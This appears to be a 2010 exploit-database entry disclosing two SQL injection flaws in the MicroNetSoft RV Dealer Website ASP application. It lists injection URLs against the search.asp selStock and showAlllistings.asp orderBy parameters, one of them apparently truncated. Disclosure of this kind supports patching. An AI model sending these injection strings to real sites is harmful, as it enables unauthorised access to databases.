MicroNetSoft RV Dealer Website SQL Injection Vulnerability

2010-11-30T00:00:00
ID 1337DAY-ID-14996
Type zdt
Reporter n/a
Modified 2010-11-30T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            ==========================================================
MicroNetSoft RV Dealer Website SQL Injection Vulnerability
==========================================================

TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
 
SQL INJECTION BUGS:
 
http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union



#  0day.today [2018-03-16]  #